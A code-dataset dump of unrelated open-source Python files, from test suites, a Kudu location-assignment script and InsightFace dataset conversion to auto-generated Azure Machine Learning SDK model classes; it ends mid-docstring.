async def _render_keyboard(self, data: Dict, manager: DialogManager) -> List[List[InlineKeyboardButton]]:
return [[
InlineKeyboardButton(
text=await self.text.render_text(data, manager),
url=await self.url.render_text(data, manager)
)
]]
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_platform.py
|
Maikor/ydk-py
| 177 |
129191
|
""" Cisco_IOS_XE_platform
Cisco XE Native Platform Yang model.
Copyright (c) 2016, 2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
|
tests/plugins/precision/test_deepspeed_precision.py
|
mathemusician/pytorch-lightning
| 3,469 |
129202
|
<filename>tests/plugins/precision/test_deepspeed_precision.py
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import pytest
from pytorch_lightning.plugins.precision.deepspeed import DeepSpeedPrecisionPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
def test_invalid_precision_with_deepspeed_precision():
with pytest.raises(ValueError, match="is not supported. `precision` must be one of"):
DeepSpeedPrecisionPlugin(precision=64, amp_type="native")
@mock.patch("pytorch_lightning.plugins.precision.deepspeed._DEEPSPEED_GREATER_EQUAL_0_6", False)
def test_incompatible_bfloat16_raises_error_with_deepspeed_version():
with pytest.raises(MisconfigurationException, match="is not supported with `deepspeed < v0.6`"):
DeepSpeedPrecisionPlugin(precision="bf16", amp_type="native")
|
agents/tools/simulate_test.py
|
DoxasticFox/batch-ppo
| 210 |
129238
|
<reponame>DoxasticFox/batch-ppo
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the simulation operation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from agents import tools
class SimulateTest(tf.test.TestCase):
def test_done_automatic(self):
batch_env = self._create_test_batch_env((1, 2, 3, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, log=False, reset=False)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
self.assertAllEqual([True, False, False, False], sess.run(done))
self.assertAllEqual([True, True, False, False], sess.run(done))
self.assertAllEqual([True, False, True, False], sess.run(done))
self.assertAllEqual([True, True, False, True], sess.run(done))
def test_done_forced(self):
reset = tf.placeholder_with_default(False, ())
batch_env = self._create_test_batch_env((2, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, False, reset)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
self.assertAllEqual([False, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done, {reset: True}))
self.assertAllEqual([True, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done, {reset: True}))
self.assertAllEqual([True, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done))
self.assertAllEqual([True, True], sess.run(done))
def test_reset_automatic(self):
batch_env = self._create_test_batch_env((1, 2, 3, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, log=False, reset=False)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(10):
sess.run(done)
self.assertAllEqual([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], batch_env[0].steps)
self.assertAllEqual([2, 2, 2, 2, 2], batch_env[1].steps)
self.assertAllEqual([3, 3, 3, 1], batch_env[2].steps)
self.assertAllEqual([4, 4, 2], batch_env[3].steps)
def test_reset_forced(self):
reset = tf.placeholder_with_default(False, ())
batch_env = self._create_test_batch_env((2, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, False, reset)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(done)
sess.run(done, {reset: True})
sess.run(done)
sess.run(done, {reset: True})
sess.run(done)
sess.run(done)
sess.run(done)
self.assertAllEqual([1, 2, 2, 2], batch_env[0].steps)
self.assertAllEqual([1, 2, 4], batch_env[1].steps)
def _create_test_batch_env(self, durations):
envs = []
for duration in durations:
env = tools.MockEnvironment(
observ_shape=(2, 3), action_shape=(3,),
min_duration=duration, max_duration=duration)
env = tools.wrappers.ConvertTo32Bit(env)
envs.append(env)
batch_env = tools.BatchEnv(envs, blocking=True)
batch_env = tools.InGraphBatchEnv(batch_env)
return batch_env
if __name__ == '__main__':
tf.test.main()
|
lstm_code/nicodjimenez/test2.py
|
drpreetyrai/ChatBotCourse
| 5,087 |
129265
|
import numpy as np
import sys
from lstm import LstmParam, LstmNetwork
class ToyLossLayer:
"""
Computes square loss with first element of hidden layer array.
"""
@classmethod
def loss(self, pred, label):
return (pred[0] - label) ** 2
@classmethod
def bottom_diff(self, pred, label):
diff = np.zeros_like(pred)
diff[0] = 2 * (pred[0] - label)
return diff
class Primes:
def __init__(self):
self.primes = list()
for i in range(2, 100):
is_prime = True
for j in range(2, i-1):
if i % j == 0:
is_prime = False
if is_prime:
self.primes.append(i)
self.primes_count = len(self.primes)
def get_sample(self, x_dim, y_dim, index):
result = np.zeros((x_dim+y_dim))
for i in range(index, index + x_dim + y_dim):
result[i-index] = self.primes[i%self.primes_count]/100.0
return result
def example_0():
mem_cell_ct = 100
x_dim = 50
concat_len = x_dim + mem_cell_ct
lstm_param = LstmParam(mem_cell_ct, x_dim)
lstm_net = LstmNetwork(lstm_param)
primes = Primes()
x_list = []
y_list = []
for i in range(0, 10):
sample = primes.get_sample(x_dim, 1, i)
x = sample[0:x_dim]
y = sample[x_dim:x_dim+1].tolist()[0]
x_list.append(x)
y_list.append(y)
for cur_iter in range(10000):
if cur_iter % 1000 == 0:
print "y_list=", y_list
for ind in range(len(y_list)):
lstm_net.x_list_add(x_list[ind])
if cur_iter % 1000 == 0:
print "y_pred[%d] : %f" % (ind, lstm_net.lstm_node_list[ind].state.h[0])
loss = lstm_net.y_list_is(y_list, ToyLossLayer)
if cur_iter % 1000 == 0:
print "loss: ", loss
lstm_param.apply_diff(lr=0.01)
lstm_net.x_list_clear()
if __name__ == "__main__":
example_0()
|
recognition/arcface_oneflow/tools/dataset_convert/mx_recordio_2_ofrecord_shuffled_npart.py
|
Intsigstephon/insightface
| 12,377 |
129294
|
<reponame>Intsigstephon/insightface<gh_stars>1000+
import os
import sys
import struct
import argparse
import numbers
import random
from mxnet import recordio
import oneflow.core.record.record_pb2 as of_record
def parse_arguement(argv):
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_dir",
type=str,
default="insightface/datasets/faces_emore",
help="Root directory to mxnet dataset.",
)
parser.add_argument(
"--output_filepath",
type=str,
default="./ofrecord",
help="Path to output OFRecord.",
)
parser.add_argument(
"--num_part",
type=int,
default=96,
help="num_part of OFRecord to generate.",
)
return parser.parse_args(argv)
def load_train_data(data_dir):
path_imgrec = os.path.join(data_dir, "train.rec")
path_imgidx = path_imgrec[0:-4] + ".idx"
print(
"Loading recordio {}\n\
Corresponding record idx is {}".format(
path_imgrec, path_imgidx
)
)
imgrec = recordio.MXIndexedRecordIO(
path_imgidx, path_imgrec, "r", key_type=int
)
# Read header0 to get some info.
identity_key_start = 0
identity_key_end = 0
imgidx_list = []
id2range = {}
rec0 = imgrec.read_idx(0)
header0, img_str = recordio.unpack(rec0)
if header0.flag > 0:
identity_key_start = int(header0.label[0])
identity_key_end = int(header0.label[1])
imgidx_list = range(1, identity_key_start)
# Read identity id range
for identity in range(identity_key_start, identity_key_end):
rec = imgrec.read_idx(identity)
header, s = recordio.unpack(rec)
a, b = int(header.label[0]), int(header.label[1])
id2range[identity] = (a, b)
else:
imgidx_list = imgrec.keys
return imgrec, imgidx_list
def convert_to_ofrecord(img_data):
""" Convert python dictionary formath data of one image to of.Example proto.
Args:
img_data: Python dict.
Returns:
example: The converted of.Exampl
"""
def _int32_feature(value):
"""Wrapper for inserting int32 features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(int32_list=of_record.Int32List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(float_list=of_record.FloatList(value=value))
def _double_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(double_list=of_record.DoubleList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
# if isinstance(value, six.string_types):
# value = six.binary_type(value, encoding='utf-8')
return of_record.Feature(bytes_list=of_record.BytesList(value=[value]))
example = of_record.OFRecord(
feature={
"label": _int32_feature(img_data["label"]),
"encoded": _bytes_feature(img_data["pixel_data"]),
}
)
return example
def main(args):
# Convert recordio to ofrecord
imgrec, imgidx_list = load_train_data(data_dir=args.data_dir)
imgidx_list = list(imgidx_list)
random.shuffle(imgidx_list)
output_dir = os.path.join(args.output_filepath, "train")
if not os.path.exists(output_dir):
os.makedirs(output_dir)
num_images = len(imgidx_list)
num_images_per_part = (num_images + args.num_part) // args.num_part
print("num_images", num_images, "num_images_per_part", num_images_per_part)
for part_id in range(args.num_part):
part_name = "part-" + "{:0>5d}".format(part_id)
output_file = os.path.join(output_dir, part_name)
file_idx_start = part_id * num_images_per_part
file_idx_end = min((part_id + 1) * num_images_per_part, num_images)
print("part-"+str(part_id), "start", file_idx_start, "end", file_idx_end)
with open(output_file, "wb") as f:
for file_idx in range(file_idx_start, file_idx_end):
idx = imgidx_list[file_idx]
if idx % 10000 == 0:
print(
"Converting images: {} of {}".format(
idx, len(imgidx_list)
)
)
img_data = {}
rec = imgrec.read_idx(idx)
header, s = recordio.unpack(rec)
label = header.label
if not isinstance(label, numbers.Number):
label = label[0]
img_data["label"] = int(label)
img_data["pixel_data"] = s
example = convert_to_ofrecord(img_data)
size = example.ByteSize()
f.write(struct.pack("q", size))
f.write(example.SerializeToString())
if __name__ == "__main__":
main(parse_arguement(sys.argv[1:]))
|
client/verta/verta/_swagger/_public/modeldb/versioning/model/VersioningS3DatasetDiff.py
|
CaptEmulation/modeldb
| 835 |
129295
|
<reponame>CaptEmulation/modeldb<gh_stars>100-1000
# THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class VersioningS3DatasetDiff(BaseType):
def __init__(self, path=None):
required = {
"path": False,
}
self.path = path
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .VersioningPathDatasetDiff import VersioningPathDatasetDiff
tmp = d.get('path', None)
if tmp is not None:
d['path'] = VersioningPathDatasetDiff.from_json(tmp)
return VersioningS3DatasetDiff(**d)
|
elliot/utils/logger_util.py
|
gategill/elliot
| 175 |
129296
|
<reponame>gategill/elliot
import atexit
from logging.config import ConvertingList, ConvertingDict, valid_ident
from logging.handlers import QueueHandler, QueueListener
from queue import Queue
def _resolve_handlers(l):
if not isinstance(l, ConvertingList):
return l
# Indexing the list performs the evaluation.
return [l[i] for i in range(len(l))]
def _resolve_queue(q):
if not isinstance(q, ConvertingDict):
return q
if '__resolved_value__' in q:
return q['__resolved_value__']
cname = q.pop('class')
klass = q.configurator.resolve(cname)
props = q.pop('.', None)
kwargs = {k: q[k] for k in q if valid_ident(k)}
result = klass(**kwargs)
if props:
for name, value in props.items():
setattr(result, name, value)
q['__resolved_value__'] = result
return result
class QueueListenerHandler(QueueHandler):
def __init__(self, handlers, respect_handler_level=False, auto_run=True, queue=Queue(-1)):
queue = _resolve_queue(queue)
super().__init__(queue)
handlers = _resolve_handlers(handlers)
self._listener = QueueListener(
self.queue,
*handlers,
respect_handler_level=respect_handler_level)
if auto_run:
self.start()
atexit.register(self.stop)
def start(self):
self._listener.start()
def stop(self):
self._listener.stop()
def emit(self, record):
return super().emit(record)
|
src/plotman/_tests/plot_util_test.py
|
pieterhelsen/plotman
| 1,016 |
129342
|
<filename>src/plotman/_tests/plot_util_test.py
import os
import pyfakefs
from plotman import plot_util
from plotman.plot_util import GB
def test_human_format() -> None:
assert plot_util.human_format(3442000000, 0) == "3G"
assert plot_util.human_format(3542000, 2) == "3.54M"
assert plot_util.human_format(354, 0) == "354"
assert plot_util.human_format(354, 0, True) == "354"
assert plot_util.human_format(354, 2) == "354.00"
assert plot_util.human_format(422399296143, 2) == "422.40G"
assert plot_util.human_format(422399296143, 2, True) == "393.39Gi"
def test_time_format() -> None:
assert plot_util.time_format(34) == "34s"
assert plot_util.time_format(59) == "59s"
assert plot_util.time_format(60) == "0:01"
assert plot_util.time_format(119) == "0:01"
assert plot_util.time_format(120) == "0:02"
assert plot_util.time_format(3694) == "1:01"
def test_split_path_prefix() -> None:
assert plot_util.split_path_prefix([]) == ("", [])
assert plot_util.split_path_prefix(["/a/0", "/b/1", "/c/2"]) == (
"",
["/a/0", "/b/1", "/c/2"],
)
assert plot_util.split_path_prefix(["/a/b/0", "/a/b/1", "/a/b/2"]) == (
"/a/b",
["0", "1", "2"],
)
def test_columns() -> None:
assert plot_util.column_wrap(list(range(8)), 3, filler="--") == [
[0, 3, 6],
[1, 4, 7],
[2, 5, "--"],
]
assert plot_util.column_wrap(list(range(9)), 3, filler="--") == [
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
]
assert plot_util.column_wrap(list(range(3)), 1, filler="--") == [[0], [1], [2]]
def test_list_plots(fs: pyfakefs.fake_filesystem.FakeFilesystem) -> None:
fs.create_file("/t/plot-k32-0.plot", st_size=108 * GB)
fs.create_file("/t/plot-k32-1.plot", st_size=108 * GB)
fs.create_file("/t/.plot-k32-2.plot", st_size=108 * GB)
fs.create_file("/t/plot-k32-3.plot.2.tmp", st_size=108 * GB)
fs.create_file("/t/plot-k32-4.plot", st_size=100 * GB)
fs.create_file("/t/plot-k32-5.plot", st_size=108 * GB)
fs.create_file("/t/plot-k33-6.plot", st_size=108 * GB)
fs.create_file("/t/plot-k33-7.plot", st_size=216 * GB)
assert plot_util.list_plots("/t/") == [
"/t/plot-k32-0.plot",
"/t/plot-k32-1.plot",
"/t/plot-k32-5.plot",
"/t/plot-k33-7.plot",
]
def test_get_plotsize() -> None:
assert [659272492, 107287518791, 221143636517, 455373353413, 936816632588] == [
plot_util.get_plotsize(n) for n in [25, 32, 33, 34, 35]
]
|
src/kudu/scripts/assign-location.py
|
attilabukor/kudu
| 1,538 |
129346
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import errno
import fcntl
import json
import time
import random
# This is a simple sequencer to be run as a location assignment script
# by a Kudu master. The script can be used in location-aware test scenarios
# and other cases when location assignment rules are specified simply as the
# distribution of tablet servers among locations: i.e. how many tablet
# servers should be in every specified location (see below for an example).
#
# The script takes as input location mapping rules and an identifier.
# On success, the script prints the location assigned to the specified
# identifier to stdout. The identifier might be any string uniquely identifying
# a tablet server.
#
# Locations are assigned based on:
# a) Location mapping rules specified in the command line and sequencer's
# offset persistently stored in a state file.
# b) Previously established and persisted { id, location } mappings in the
# state file.
#
# Once assigned, the location for the specified identifier is recorded and
# output again upon next call of the script for the same identifier.
#
# It's safe to run multiple instances of the script concurrently with the
# same set of parameters. The access to the sequencer's state file is
# serialized and the scripts produces consistent results for all concurrent
# callers.
#
# A location mapping rule is specified as a pair 'loc:num', where the 'num'
# stands for the number of servers to assign to the location 'loc'. Location
# mapping rules are provided to the script by --map 'loc:num' command line
# arguments.
#
# Below is an example of invocation of the script for location mapping rules
# specifying that location 'l0' should have one tablet server, location 'l1'
# should have two, and location 'l2' should have three. The script is run
# to assign a location for a tablet server running at IP address 127.1.2.3.
#
# assign-location.py --map l0:1 --map l1:2 --map l2:3 127.1.2.3
#
class LocationAssignmentRule(object):
def __init__(self, location_mapping_rules):
# Convert the input location information into an auxiliary array of
# location strings.
self.location_mapping_rules = location_mapping_rules
if self.location_mapping_rules is None:
self.location_mapping_rules = []
self.locations = []
self.total_count = 0
seen_locations = []
for info in self.location_mapping_rules:
location, server_num_str = info.split(':')
seen_locations.append(location)
server_num = int(server_num_str)
for i in range(0, server_num):
self.total_count += 1
self.locations.append(location)
assert (len(set(seen_locations)) == len(seen_locations)), \
'duplicate locations specified: {0}'.format(seen_locations)
def get_location(self, idx):
"""
Get location for the specified index.
"""
if self.locations:
return self.locations[idx % len(self.locations)]
else:
return ""
def acquire_advisory_lock(fpath):
"""
Acquire a lock on a special .lock file. Don't block while trying: return
if failed to acquire a lock in 30 seconds.
"""
timeout_seconds = 30
now = time.time()
deadline = now + timeout_seconds
random.seed(int(now))
fpath_lock_file = fpath + ".lock"
# Open the lock file; create the file if doesn't exist.
lock_file = open(fpath_lock_file, 'w+')
got_lock = False
while time.time() < deadline:
try:
fcntl.flock(lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
got_lock = True
break
except IOError as e:
if e.errno != errno.EAGAIN:
raise
else:
time.sleep(random.uniform(0.001, 0.100))
if not got_lock:
raise Exception('could not obtain exclusive lock for {} in {} seconds',
fpath_lock_file, timeout_seconds)
return lock_file
def get_location(fpath, rule, uid, relaxed):
"""
Return location for the specified identifier 'uid'. To do that, use the
specified location mapping rules and the information stored
in the sequencer's state file.
* Obtain advisory lock for the state file (using additional .lock file)
* If the sequencer's state file exists:
1. Open the state file in read-only mode.
2. Read the information from the state file and search for location
assigned to the server with the specified identifier.
a. If already assigned location found:
-- Return the location.
b. If location assigned to the identifier is not found:
-- Use current sequence number 'seq' to assign next location
by calling LocationAssignmentRule.get_location(seq).
-- Add the newly generated location assignment into the
sequencer's state.
-- Increment the sequence number.
-- Reopen the state file for writing (if file exists)
-- Rewrite the file with the new state of the sequencer.
-- Return the newly assigned location.
* If the sequencer's state file does not exist:
1. Set sequence number 'seq' to 0.
2. Use current sequence number 'seq' to assign next location
by calling LocationAssignmentRule.get_location(seq).
3. Update the sequencer's state accordingly.
3. Rewrite the file with the new state of the sequencer.
4. Return the newly assigned location.
"""
lock_file = acquire_advisory_lock(fpath)
state_file = None
try:
state_file = open(fpath)
except IOError as e:
if e.errno != errno.ENOENT:
raise
new_assignment = False
if state_file is None:
seq = 0
state = {}
state['seq'] = seq
state['mapping_rules'] = rule.location_mapping_rules
state['mappings'] = {}
mappings = state['mappings']
new_assignment = True
else:
# If the file exists, it must have proper content.
state = json.load(state_file)
seq = state.get('seq')
mapping_rules = state.get('mapping_rules')
# Make sure the stored mapping rule corresponds to the specified in args.
rule_stored = json.dumps(mapping_rules)
rule_specified = json.dumps(rule.location_mapping_rules)
if rule_stored != rule_specified:
raise Exception('stored and specified mapping rules mismatch: '
'{0} vs {1}'.format(rule_stored, rule_specified))
mappings = state['mappings']
location = mappings.get(uid, None)
if location is None:
seq += 1
state['seq'] = seq
new_assignment = True
if not new_assignment:
return location
if not relaxed and rule.total_count != 0 and rule.total_count <= seq:
raise Exception('too many unique identifiers ({0}) to assign next location '
'to {1} using mapping rules {2}. State: {3}'.format(
seq + 1, uid, rule.location_mapping_rules, json.dumps(state)))
if relaxed and rule.total_count <= seq:
return ""
# Get next location and add the { uid, location} binding into the mappings.
location = rule.get_location(seq)
mappings[uid] = location
# Rewrite the file with the updated state information.
if state_file is not None:
state_file.close()
state_file = open(fpath, 'w+')
json.dump(state, state_file)
state_file.close()
lock_file.close()
return location
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--state_store",
nargs="?",
default="/tmp/location-sequencer-state",
help="path to a file to store the sequencer's state")
parser.add_argument("--map", "-m",
action="append",
dest="location_mapping_rules",
metavar="RULE",
help="location mapping rule: number of tablet servers per specified "
"location in form <location>:<number>; this option may be specified "
"multiple times")
parser.add_argument("--relaxed",
action="store_true",
help="whether to allow more location assignments than specified "
"by the specified mapping rules")
parser.add_argument("uid",
help="hostname, IP address, or any other unique identifier")
args = parser.parse_args()
location = get_location(args.state_store,
LocationAssignmentRule(args.location_mapping_rules), args.uid, args.relaxed)
print(location)
if __name__ == "__main__":
main()
|
sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
| 2,728 |
129354
|
<reponame>rsdoherty/azure-sdk-for-python<filename>sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_models_py3.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._azure_machine_learning_workspaces_enums import *
class Compute(msrest.serialization.Model):
"""Machine Learning compute object.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AKS, AmlCompute, ComputeInstance, DataFactory, DataLakeAnalytics, Databricks, HDInsight, VirtualMachine.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
}
_subtype_map = {
'compute_type': {'AKS': 'AKS', 'AmlCompute': 'AmlCompute', 'ComputeInstance': 'ComputeInstance', 'DataFactory': 'DataFactory', 'DataLakeAnalytics': 'DataLakeAnalytics', 'Databricks': 'Databricks', 'HDInsight': 'HDInsight', 'VirtualMachine': 'VirtualMachine'}
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
**kwargs
):
super(Compute, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
self.compute_location = compute_location
self.provisioning_state = None
self.description = description
self.created_on = None
self.modified_on = None
self.resource_id = resource_id
self.provisioning_errors = None
self.is_attached_compute = None
class AKS(Compute):
"""A Machine Learning compute based on AKS.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: AKS properties.
:type properties: ~azure.mgmt.machinelearningservices.models.AKSProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'AKSProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["AKSProperties"] = None,
**kwargs
):
super(AKS, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'AKS' # type: str
self.properties = properties
class ComputeSecrets(msrest.serialization.Model):
"""Secrets related to a Machine Learning compute. Might differ for every type of compute.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AksComputeSecrets, DatabricksComputeSecrets, VirtualMachineSecrets.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
}
_subtype_map = {
'compute_type': {'AKS': 'AksComputeSecrets', 'Databricks': 'DatabricksComputeSecrets', 'VirtualMachine': 'VirtualMachineSecrets'}
}
def __init__(
self,
**kwargs
):
super(ComputeSecrets, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
class AksComputeSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on AKS.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param user_kube_config: Content of kubeconfig file that can be used to connect to the
Kubernetes cluster.
:type user_kube_config: str
:param admin_kube_config: Content of kubeconfig file that can be used to connect to the
Kubernetes cluster.
:type admin_kube_config: str
:param image_pull_secret_name: Image registry pull secret.
:type image_pull_secret_name: str
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'user_kube_config': {'key': 'userKubeConfig', 'type': 'str'},
'admin_kube_config': {'key': 'adminKubeConfig', 'type': 'str'},
'image_pull_secret_name': {'key': 'imagePullSecretName', 'type': 'str'},
}
def __init__(
self,
*,
user_kube_config: Optional[str] = None,
admin_kube_config: Optional[str] = None,
image_pull_secret_name: Optional[str] = None,
**kwargs
):
super(AksComputeSecrets, self).__init__(**kwargs)
self.compute_type = 'AKS' # type: str
self.user_kube_config = user_kube_config
self.admin_kube_config = admin_kube_config
self.image_pull_secret_name = image_pull_secret_name
class AksNetworkingConfiguration(msrest.serialization.Model):
"""Advance configuration for AKS networking.
:param subnet_id: Virtual network subnet resource ID the compute nodes belong to.
:type subnet_id: str
:param service_cidr: A CIDR notation IP range from which to assign service cluster IPs. It must
not overlap with any Subnet IP ranges.
